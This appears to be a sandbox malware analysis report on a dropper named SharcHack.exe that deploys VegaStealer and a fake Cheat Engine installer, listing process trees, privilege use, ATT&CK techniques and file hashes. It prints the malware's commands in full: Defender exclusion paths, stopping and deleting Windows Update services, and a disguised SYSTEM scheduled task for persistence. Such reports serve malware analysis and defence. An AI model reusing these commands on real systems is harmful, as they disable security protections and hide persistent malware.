2580	3.exe
1900	powershell.exe
2340	CheatEngine75.tmp
2580	3.exe
2580	3.exe
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
1460	powershell.exe
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
2340	CheatEngine75.tmp
1404	updater.exe
1404	updater.exe
2976	powershell.exe
1404	updater.exe
1404	updater.exe
1404	updater.exe
1404	updater.exe
1404	updater.exe
1404	updater.exe
1744	powershell.exe
1404	updater.exe
1404	updater.exe
1404	updater.exe
1404	updater.exe
408	conhost.exe
408	conhost.exe
1404	updater.exe
1404	updater.exe
1488	conhost.exe
1488	conhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2340	CheatEngine75.tmp

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeDebugPrivilege	3056	v2.exe
Token: SeDebugPrivilege	844	powershell.exe
Token: SeShutdownPrivilege	1216	powercfg.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeShutdownPrivilege	2128	powercfg.exe
Token: SeShutdownPrivilege	2856	powercfg.exe
Token: SeShutdownPrivilege	2764	powercfg.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe
Token: SeShutdownPrivilege	2584	powercfg.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeShutdownPrivilege	2380	powercfg.exe
Token: SeShutdownPrivilege	1516	powercfg.exe
Token: SeShutdownPrivilege	1124	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	1320	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1320	WMIC.exe
Token: SeSecurityPrivilege	1320	WMIC.exe
Token: SeTakeOwnershipPrivilege	1320	WMIC.exe
Token: SeLoadDriverPrivilege	1320	WMIC.exe
Token: SeSystemtimePrivilege	1320	WMIC.exe
Token: SeBackupPrivilege	1320	WMIC.exe
Token: SeRestorePrivilege	1320	WMIC.exe
Token: SeShutdownPrivilege	1320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1320	WMIC.exe
Token: SeUndockPrivilege	1320	WMIC.exe
Token: SeManageVolumePrivilege	1320	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1320	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1320	WMIC.exe
Token: SeSecurityPrivilege	1320	WMIC.exe
Token: SeTakeOwnershipPrivilege	1320	WMIC.exe
Token: SeLoadDriverPrivilege	1320	WMIC.exe
Token: SeSystemtimePrivilege	1320	WMIC.exe
Token: SeBackupPrivilege	1320	WMIC.exe
Token: SeRestorePrivilege	1320	WMIC.exe
Token: SeShutdownPrivilege	1320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1320	WMIC.exe
Token: SeUndockPrivilege	1320	WMIC.exe
Token: SeManageVolumePrivilege	1320	WMIC.exe
Token: SeLockMemoryPrivilege	1488	conhost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2340	CheatEngine75.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1904 wrote to memory of 2580	1904	SharcHack.exe	30
PID 1904 wrote to memory of 2580	1904	SharcHack.exe	30
PID 1904 wrote to memory of 2580	1904	SharcHack.exe	30
PID 1904 wrote to memory of 2580	1904	SharcHack.exe	30
PID 1904 wrote to memory of 1680	1904	SharcHack.exe	31
PID 1904 wrote to memory of 1680	1904	SharcHack.exe	31
PID 1904 wrote to memory of 1680	1904	SharcHack.exe	31
PID 1904 wrote to memory of 1680	1904	SharcHack.exe	31
PID 1904 wrote to memory of 3064	1904	SharcHack.exe	32
PID 1904 wrote to memory of 3064	1904	SharcHack.exe	32
PID 1904 wrote to memory of 3064	1904	SharcHack.exe	32
PID 1904 wrote to memory of 3064	1904	SharcHack.exe	32
PID 3064 wrote to memory of 2340	3064	CheatEngine75.exe	33
PID 3064 wrote to memory of 2340	3064	CheatEngine75.exe	33
PID 3064 wrote to memory of 2340	3064	CheatEngine75.exe	33
PID 3064 wrote to memory of 2340	3064	CheatEngine75.exe	33
PID 3064 wrote to memory of 2340	3064	CheatEngine75.exe	33
PID 3064 wrote to memory of 2340	3064	CheatEngine75.exe	33
PID 3064 wrote to memory of 2340	3064	CheatEngine75.exe	33
PID 1680 wrote to memory of 3056	1680	VegaStealer_v2.exe	34
PID 1680 wrote to memory of 3056	1680	VegaStealer_v2.exe	34
PID 1680 wrote to memory of 3056	1680	VegaStealer_v2.exe	34
PID 1680 wrote to memory of 3056	1680	VegaStealer_v2.exe	34
PID 1948 wrote to memory of 1216	1948	cmd.exe	44
PID 1948 wrote to memory of 1216	1948	cmd.exe	44
PID 1948 wrote to memory of 1216	1948	cmd.exe	44
PID 2296 wrote to memory of 1592	2296	cmd.exe	45
PID 2296 wrote to memory of 1592	2296	cmd.exe	45
PID 2296 wrote to memory of 1592	2296	cmd.exe	45
PID 2296 wrote to memory of 1652	2296	cmd.exe	46
PID 2296 wrote to memory of 1652	2296	cmd.exe	46
PID 2296 wrote to memory of 1652	2296	cmd.exe	46
PID 2296 wrote to memory of 352	2296	cmd.exe	47
PID 2296 wrote to memory of 352	2296	cmd.exe	47
PID 2296 wrote to memory of 352	2296	cmd.exe	47
PID 1948 wrote to memory of 2128	1948	cmd.exe	48
PID 1948 wrote to memory of 2128	1948	cmd.exe	48
PID 1948 wrote to memory of 2128	1948	cmd.exe	48
PID 1948 wrote to memory of 2856	1948	cmd.exe	49
PID 1948 wrote to memory of 2856	1948	cmd.exe	49
PID 1948 wrote to memory of 2856	1948	cmd.exe	49
PID 1948 wrote to memory of 2764	1948	cmd.exe	50
PID 1948 wrote to memory of 2764	1948	cmd.exe	50
PID 1948 wrote to memory of 2764	1948	cmd.exe	50
PID 2296 wrote to memory of 2784	2296	cmd.exe	51
PID 2296 wrote to memory of 2784	2296	cmd.exe	51
PID 2296 wrote to memory of 2784	2296	cmd.exe	51
PID 2296 wrote to memory of 2792	2296	cmd.exe	52
PID 2296 wrote to memory of 2792	2296	cmd.exe	52
PID 2296 wrote to memory of 2792	2296	cmd.exe	52
PID 2296 wrote to memory of 2872	2296	cmd.exe	53
PID 2296 wrote to memory of 2872	2296	cmd.exe	53
PID 2296 wrote to memory of 2872	2296	cmd.exe	53
PID 1900 wrote to memory of 2492	1900	powershell.exe	54
PID 1900 wrote to memory of 2492	1900	powershell.exe	54
PID 1900 wrote to memory of 2492	1900	powershell.exe	54
PID 2296 wrote to memory of 2916	2296	cmd.exe	55
PID 2296 wrote to memory of 2916	2296	cmd.exe	55
PID 2296 wrote to memory of 2916	2296	cmd.exe	55
PID 2296 wrote to memory of 2796	2296	cmd.exe	56
PID 2296 wrote to memory of 2796	2296	cmd.exe	56
PID 2296 wrote to memory of 2796	2296	cmd.exe	56
PID 2296 wrote to memory of 2512	2296	cmd.exe	57
PID 2296 wrote to memory of 2512	2296	cmd.exe	57

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1152
- C:\Users\Admin\AppData\Local\Temp\SharcHack.exe
  "C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Users\Admin\AppData\Local\Temp\3.exe
    "C:\Users\Admin\AppData\Local\Temp\3.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2580
- - C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe
    "C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\v2.exe
      "C:\Users\Admin\AppData\Local\Temp\v2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3056
- - C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe
    "C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Users\Admin\AppData\Local\Temp\is-HAQ91.tmp\CheatEngine75.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-HAQ91.tmp\CheatEngine75.tmp" /SL5="$50132,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks for any installed AV software in registry
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of FindShellTrayWindow
      PID:2340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:844
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2296
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1592
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1652
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:352
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2784
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2792
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:2872
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:2916
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:2796
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2512
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1984
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1216
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2128
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2856
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1460
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2976
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:1812
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:984
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:332
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2088
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2944
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1852
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:884
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:944
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:832
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2160
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2824
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2404
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2584
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2380
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1516
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1744
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2432
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe ubulqosn
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:408
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:1320
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1192
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe vgyegivgfazcjxdl 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOyRpUwzATAbwxDv0BlAH+ISI2MOv7cXgWh/hEHn9UpTLH2AUxVXP8zWMLLWvPHAJe2SIfhjGncq3xQ+gVn+I4NKh77PPjDPgwHNzByaS5XiUtDR8Md5EhmkOEwD9v8Eh4nbJIewLTK837YGsKnb02yQo3e+jdFtCWzMfMeobPaXFvrKzv2emNNnxavmVO2FkfkcC1DvbnhN7NqgiVLh1FnuRerr7Rs9GSm8wk3eogEBuxtyJF/l7QvFFEn+PmzyQ6wNeX5T4KpCB8N2LdQ7qGf0xREtOLrL2we+R3IiFUCw/PgUnlB9aOUvPUntLmUYwnVg3n39kwuMDyHF7sntpqwSQW5ruNhQsPrhI9EqpLJ48=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1488

C:\Windows\system32\taskeng.exe
taskeng.exe {BF4C027B-E5C7-4D58-B87F-9052DEEBE706} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1224
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d96824d046b6859888d4b2ae43402a84

SHA1
522df903eb60bcde96dd04678b89e190bc3583db

SHA256
4594e397293c9774d32622439ad75987611c76818bb2f3cf86d012863999640f

SHA512
d4cf183b0fc4ee062f050d6ce2be1ebab35fcc59f36899f28173361bf55d329b15cfa05e77f01412b7affa87e6b0a9279771d6d96034ca9d7270a5d389d5f98a

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe

Filesize
3.5MB

MD5
a4c45aaf11fc601009a5682fd23790ee

SHA1
a8eac848583296b135af5a473fc8ce48af970b65

SHA256
d89c0e12b5fbbe103522fa152adb3edd6afff88d34d2bbf58caf28e9c4da0526

SHA512
cc735b14e4df0260c8302761e52fd84ba06310d2dde96c9089a8066f72b3b93d80c9e6548a18c35ecadd54479e99f80090ac31b7f30b682129b70b93095373a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA98A.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
571KB

MD5
169b6d383b7c650ab3ae2129397a6cf3

SHA1
fcaef7defb04301fd55fb1421bb15ef96d7040d6

SHA256
b896083feb2bdedc1568b62805dbd354c55e57f2d2469a52aec6c98f4ec2dedf

SHA512
7a7a7bdb508b8bf177249251c83b65a2ef4a5d8b29397cab130cb8444b23888678673a9a2e4b1c74cc095b358f923b9e7e5a91bfa8c240412d95765851f1dd87

Download Submit
C:\Users\Admin\AppData\Local\Temp\SQLite.Interop.dll

Filesize
1.3MB

MD5
0a1e95b0b1535203a1b8479dff2c03ff

SHA1
20c4b4406e8a3b1b35ca739ed59aa07ba867043d

SHA256
788d748b4d35dfd091626529457d91e9ebc8225746211086b14fb4a25785a51e

SHA512
854abcca8d807a98a9ad0ca5d2e55716c3ce26fae7ee4642796baf415c3cfad522b658963eafe504ecaed6c2ecdcdf332c9b01e43dfa342fcc5ca0fbedfe600e

Download Submit
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll

Filesize
410KB

MD5
056d3fcaf3b1d32ff25f513621e2a372

SHA1
851740bca46bab71d0b1d47e47f3eb8358cbee03

SHA256
66b64362664030bff1596cda2ec5bd5df48cc7c8313c32f771db4aa30a3f86f9

SHA512
ce47c581538f48a46d70279a62c702195beacbfafb48a5a862b3922625fe56f6887d1679c6d9366f946d3d2124cb31c2a3eacbbd14d601ea56e66575cdf46180

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA9CC.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe

Filesize
7.7MB

MD5
9f4f298bcf1d208bd3ce3907cfb28480

SHA1
05c1cfde951306f8c6e9d484d3d88698c4419c62

SHA256
bf7057293d871cac087daab42daf22c1737a1df6adc7b7963989658f3b65f4cc

SHA512
4c763c3b6d4884f77083db5ccada59bc57803b3226294eff2ec3db8f2121ac01ee240b0e822cb090f5320ce40df545b477e323efabdbca31722731adc4b46806

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-HAQ91.tmp\CheatEngine75.tmp

Filesize
3.1MB

MD5
e652d75d1d0d3f03b6b730e064e9194c

SHA1
c4220d57971c63a3f0b9f5b68560aedfdec18e64

SHA256
8958b8d498068bd0657587a04aaf011e7eabeb215276694366a154da8b55bdb9

SHA512
e5e5807224f0858d472584d06975dbe75677ad0a00727b63d1f8e2108dae179cb469ebae127be6c8d5b9de192bc741637fe1c8a9a4ef3ae46a3bde76b534a766

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-OGMS8.tmp\AVG_AV.png

Filesize
51KB

MD5
aee8e80b35dcb3cf2a5733ba99231560

SHA1
7bcf9feb3094b7d79d080597b56a18da5144ca7b

SHA256
35bbd8f390865173d65ba2f38320a04755541a0783e9f825fdb9862f80d97aa9

SHA512
dcd84221571bf809107f7aeaf94bab2f494ea0431b9dadb97feed63074322d1cf0446dbd52429a70186d3ecd631fb409102afcf7e11713e9c1041caacdb8b976

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-OGMS8.tmp\AVG_BRW.png

Filesize
29KB

MD5
0b4fa89d69051df475b75ca654752ef6

SHA1
81bf857a2af9e3c3e4632cbb88cd71e40a831a73

SHA256
60a9085cea2e072d4b65748cc71f616d3137c1f0b7eed4f77e1b6c9e3aa78b7e

SHA512
